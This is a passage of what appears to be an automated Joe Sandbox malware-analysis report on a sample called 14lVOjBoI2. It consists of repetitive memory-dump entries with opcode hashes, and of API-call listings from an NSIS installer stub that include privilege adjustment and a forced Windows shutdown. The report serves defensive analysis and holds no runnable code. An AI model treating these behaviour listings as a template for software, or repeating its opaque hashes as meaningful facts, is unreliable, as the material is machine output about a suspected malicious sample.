                                                                                                          • Instruction ID: 07ef9a297b381dbf9490c1df4808e48a4c9003d804a0ababc23287f60f817615
                                                                                                          • Opcode Fuzzy Hash: f6b5c8ea7c0e33d4ad9c04c6af2ecce650d6f4609c4139ff1565b54af5be4efc
                                                                                                          • Instruction Fuzzy Hash: CDD0673AB04008EFDB049F98EC809DDF776FB98221B048116F915A3260C6319965DB54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 294c3fd8dabb38d63fbbb57242df5dbff5f71400d6760fd7e4f18a4def7dbf8d
                                                                                                          • Instruction ID: e87028061f9eb3bf74371900407d7d9e2185aafef90263140f1ba1986c72f006
                                                                                                          • Opcode Fuzzy Hash: 294c3fd8dabb38d63fbbb57242df5dbff5f71400d6760fd7e4f18a4def7dbf8d
                                                                                                          • Instruction Fuzzy Hash: 19C08032254710135224532DB44459F7365CFCD7E03508F67F155831048D705D47419D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1f1fb161b16d360af3eddf6093698eed8871cb8ca978997faed03e04cd1148be
                                                                                                          • Instruction ID: 5a447d582181cd9ecf413c48465d63bc761e32951360334eb4d4c9d2c77af71b
                                                                                                          • Opcode Fuzzy Hash: 1f1fb161b16d360af3eddf6093698eed8871cb8ca978997faed03e04cd1148be
                                                                                                          • Instruction Fuzzy Hash: E8D0A72291E3E02FD7239338B41408CBF705D8B16030A4AEFC184CB0B7C9680D8B875A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3dc68d9353978a23b5bb4cfeab54ad6065a0505dff7b5b8b70d6a086e4ed85b8
                                                                                                          • Instruction ID: cc32f58491713e5526477671b30d359dcb9bcf670334161d0bea95d55674f22e
                                                                                                          • Opcode Fuzzy Hash: 3dc68d9353978a23b5bb4cfeab54ad6065a0505dff7b5b8b70d6a086e4ed85b8
                                                                                                          • Instruction Fuzzy Hash: 97D0C971805209DFD748DBA4D80ABE9B779A747202F4011AC9418632509BB15D51D799
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1ef6870ebede67630c17495efd9194e4b18e9e4cfe280a1f7e11dc8f1bc004e8
                                                                                                          • Instruction ID: 0169b0a8e16baf42a00849f9ec1367fa60d3a3ade5c6c0cb2c3d015b79f4d933
                                                                                                          • Opcode Fuzzy Hash: 1ef6870ebede67630c17495efd9194e4b18e9e4cfe280a1f7e11dc8f1bc004e8
                                                                                                          • Instruction Fuzzy Hash: 14C012B4041E098BE6082B60AC0CB79B2B8B707303FC82910E009028308BB884188648
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4a1ef8e7bd35b44abf379b25c818294e7de17ec6e344df7e664d258dad1f830f
                                                                                                          • Instruction ID: 5540d83c3658179e2ed26b6ccf7316b04d95634cfa131c2c0877744f05bd6032
                                                                                                          • Opcode Fuzzy Hash: 4a1ef8e7bd35b44abf379b25c818294e7de17ec6e344df7e664d258dad1f830f
                                                                                                          • Instruction Fuzzy Hash: 1CD012312683444FD3024A79D400A013BBC9F56B14B1241E6E445CB673D656ED048750
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 871068d62d374c8246bf908029c047f6fa06d42c89b106d86db7b1c85c7ed806
                                                                                                          • Instruction ID: 2b666907a01eedf36ecc380ea1f68bcbbcdff79e8cfc9448d261944517d6b9b9
                                                                                                          • Opcode Fuzzy Hash: 871068d62d374c8246bf908029c047f6fa06d42c89b106d86db7b1c85c7ed806
                                                                                                          • Instruction Fuzzy Hash: A2C08C302A43048FE200AA1CC884A4133ACEF89B05F2018A0F1048B622CB22FC004A41
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 858b1c4ff914b1be0e635bbe5d5e85760f86359a74b3ddfaf1ae5c61227d495a
                                                                                                          • Instruction ID: deb9cd3250710d5209ab33669cc3c2a995f673933fd6fdb1340475dc29568720
                                                                                                          • Opcode Fuzzy Hash: 858b1c4ff914b1be0e635bbe5d5e85760f86359a74b3ddfaf1ae5c61227d495a
                                                                                                          • Instruction Fuzzy Hash: 1DC080340453084BDD09F775DC56655332EE7C81017818510F0091666FEFB96D574F91
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                          • GetVersion.KERNEL32 ref: 004032C8
                                                                                                          • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                          • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                          • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                          • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                          • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                          • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                          • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                          • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                          • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                          • ExitProcess.KERNEL32 ref: 00403618
                                                                                                          • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                          • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                          • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                          • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                          • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                          • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                          • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                          • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                          • API String ID: 3586999533-3972089011
                                                                                                          • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                          • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                          • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                          • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                          • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $M$N
                                                                                                          • API String ID: 1638840714-813528018
                                                                                                          • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                          • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                          • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                          • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,76F93420,00441800,0043F000), ref: 0040586F
                                                                                                          • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058B7
                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058DA
                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058E0
                                                                                                          • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76F93420,00441800,0043F000), ref: 004058F0
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2035342205-1173974218
                                                                                                          • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                          • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                          • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                          • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "$0o#p$Lj#p$Lj#p$Lj#p$Lj#p$Lj#p$Lj#p$Lj#p$Lj#p
                                                                                                          • API String ID: 0-2492165561
                                                                                                          • Opcode ID: 0b52e799f045513ed1ecc3ec7b5d0f78c818aed4900635ea92699b9b6491a9d4
                                                                                                          • Instruction ID: d298ec634d409699ad8d1e03823fab61950e81b3877382cb886b81f0894929dd
                                                                                                          • Opcode Fuzzy Hash: 0b52e799f045513ed1ecc3ec7b5d0f78c818aed4900635ea92699b9b6491a9d4
                                                                                                          • Instruction Fuzzy Hash: 1A328074E40218CFEB64CFA5C994B9DBBB2BF89304F1081A9D409AB361DB759E85CF14
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 09,
                                                                                                          • API String ID: 0-2271119012
                                                                                                          • Opcode ID: 5efdff4c7882d3242b11d43716afdae9a54cacee70e5daa4e9f1da3eda62f612
                                                                                                          • Instruction ID: ee025ab610adc0295ac7e06e2c9c9542c4b9f7297da0f351934e853e05eeda05
                                                                                                          • Opcode Fuzzy Hash: 5efdff4c7882d3242b11d43716afdae9a54cacee70e5daa4e9f1da3eda62f612
                                                                                                          • Instruction Fuzzy Hash: 27C19174E00218CFDB14DFA9C994B9DBBB2AF89341F6080A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a069282d4bc08febd33f324eee47f858a3ade742d8425e47e7f335328e31bc78
                                                                                                          • Instruction ID: 9e40d636c4ed3c283c326177fd940b0c16d06f853d6fcd87a001dfaec0b3ba13
                                                                                                          • Opcode Fuzzy Hash: a069282d4bc08febd33f324eee47f858a3ade742d8425e47e7f335328e31bc78
                                                                                                          • Instruction Fuzzy Hash: 3C629D74E01268CFDB68DF69C884BDDBBB2BB89301F1085EAD409A7255DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a0927cd9118fd1217984cb228ec1ce6681675bfea6f0d26d244a844bc166a6bf
                                                                                                          • Instruction ID: cc61ad64c4ce2c142eed78b32af39da660809f76f74800f48f8b241f7939a823
                                                                                                          • Opcode Fuzzy Hash: a0927cd9118fd1217984cb228ec1ce6681675bfea6f0d26d244a844bc166a6bf
                                                                                                          • Instruction Fuzzy Hash: B5C1A274E01218CFDB14DFA9D994B9DBBB2BF89345F2080A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2bdae355d0eb22541931191dcc12d5e98a80bd40318ae147e215e3d15c6c14a4
                                                                                                          • Instruction ID: 7fb9ce66a32ee9a84ecee54aff6f9699a5a4dc9d168835ebba112ea31a6f2433
                                                                                                          • Opcode Fuzzy Hash: 2bdae355d0eb22541931191dcc12d5e98a80bd40318ae147e215e3d15c6c14a4
                                                                                                          • Instruction Fuzzy Hash: 4FC1A174E00218CFDB14DFA9C994B9DBBB2BF89301F2080A9E409AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cf7afed82ffb172d21f513f633c486c4bc9605ed71f28689871d20376570473e
                                                                                                          • Instruction ID: 2b86f94053f76b7d9d49b8815d2eb2c3b573501d9623cca7e77986c0e176a881
                                                                                                          • Opcode Fuzzy Hash: cf7afed82ffb172d21f513f633c486c4bc9605ed71f28689871d20376570473e
                                                                                                          • Instruction Fuzzy Hash: 42C19174E00218CFDB14DFA9C994B9DBBB2BF89301F2081A9E409AB355DB359E85CF11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bd2c41848fa16645ce2434247fc941f229e6ad1f24afadfaa0efbe85dbc5fa59
                                                                                                          • Instruction ID: fa4f6083af936be2c84386dcae57672aedbbecfa88e380215b886c3cfef84462
                                                                                                          • Opcode Fuzzy Hash: bd2c41848fa16645ce2434247fc941f229e6ad1f24afadfaa0efbe85dbc5fa59
                                                                                                          • Instruction Fuzzy Hash: 14C1A074E00218CFDB14DFA9D994B9DBBB2BF89341F6080A9E409BB355DB359A81CF11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b229d37de59e18e7adfc45800398764abfb8a7b61e702d21cf581474fbfaa6d7
                                                                                                          • Instruction ID: 5423dcd8ab233230303db2674a1837ae750985e65ac94944abb1e6719065796c
                                                                                                          • Opcode Fuzzy Hash: b229d37de59e18e7adfc45800398764abfb8a7b61e702d21cf581474fbfaa6d7
                                                                                                          • Instruction Fuzzy Hash: B7C19174E00218CFDB14DFA9D994B9DBBB2BF89341F6081A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4c6a7a7b424de48441f4f8d9fcbbd8a200ec90aa44f11fdcc684dfa62001eb88
                                                                                                          • Instruction ID: 936c548e980955c22b82b1ca9bd680ffe351b2a670bc826a0a0b14a1859a26be
                                                                                                          • Opcode Fuzzy Hash: 4c6a7a7b424de48441f4f8d9fcbbd8a200ec90aa44f11fdcc684dfa62001eb88
                                                                                                          • Instruction Fuzzy Hash: 58C1A074E00258CFDB14DFA9D994B9DBBB2BF89341F2081A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bd392413c5f26579438aebdd06f32abf2b3293e5dc2dc947360145de22309ce1
                                                                                                          • Instruction ID: a7ccc4aaaf28eac19ccbe763611cc52c79f21bfeb7372d6fd03386a759d639fa
                                                                                                          • Opcode Fuzzy Hash: bd392413c5f26579438aebdd06f32abf2b3293e5dc2dc947360145de22309ce1
                                                                                                          • Instruction Fuzzy Hash: F3C1A274E00218CFDB14DFA9C994B9DBBB2BF89341F6081A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e6cd42724a82b2b504e9aa5d1d907457137e6d05372d1743ec94a45a1206db6
                                                                                                          • Instruction ID: e9b83efe3a8fa3ec5a26533ff42fdeeb763a5b0828c244e1ee6f18b61e7d4eaa
                                                                                                          • Opcode Fuzzy Hash: 6e6cd42724a82b2b504e9aa5d1d907457137e6d05372d1743ec94a45a1206db6
                                                                                                          • Instruction Fuzzy Hash: 21C1A174E00218CFDB14DFA9D994B9DBBB2BF89341F2081A9E409AB355DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1ae427e2fe603327b848d172daa99b96a8376a512223d757903c479ead85abd1
                                                                                                          • Instruction ID: 81ad87cc7c3f1ad723cab1bfee8cdc371719042e20a56a3f682ee60ca74e6727
                                                                                                          • Opcode Fuzzy Hash: 1ae427e2fe603327b848d172daa99b96a8376a512223d757903c479ead85abd1
                                                                                                          • Instruction Fuzzy Hash: FBC19274E00218CFDB18DFA9D994B9DBBB2BF89341F1081A9D409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
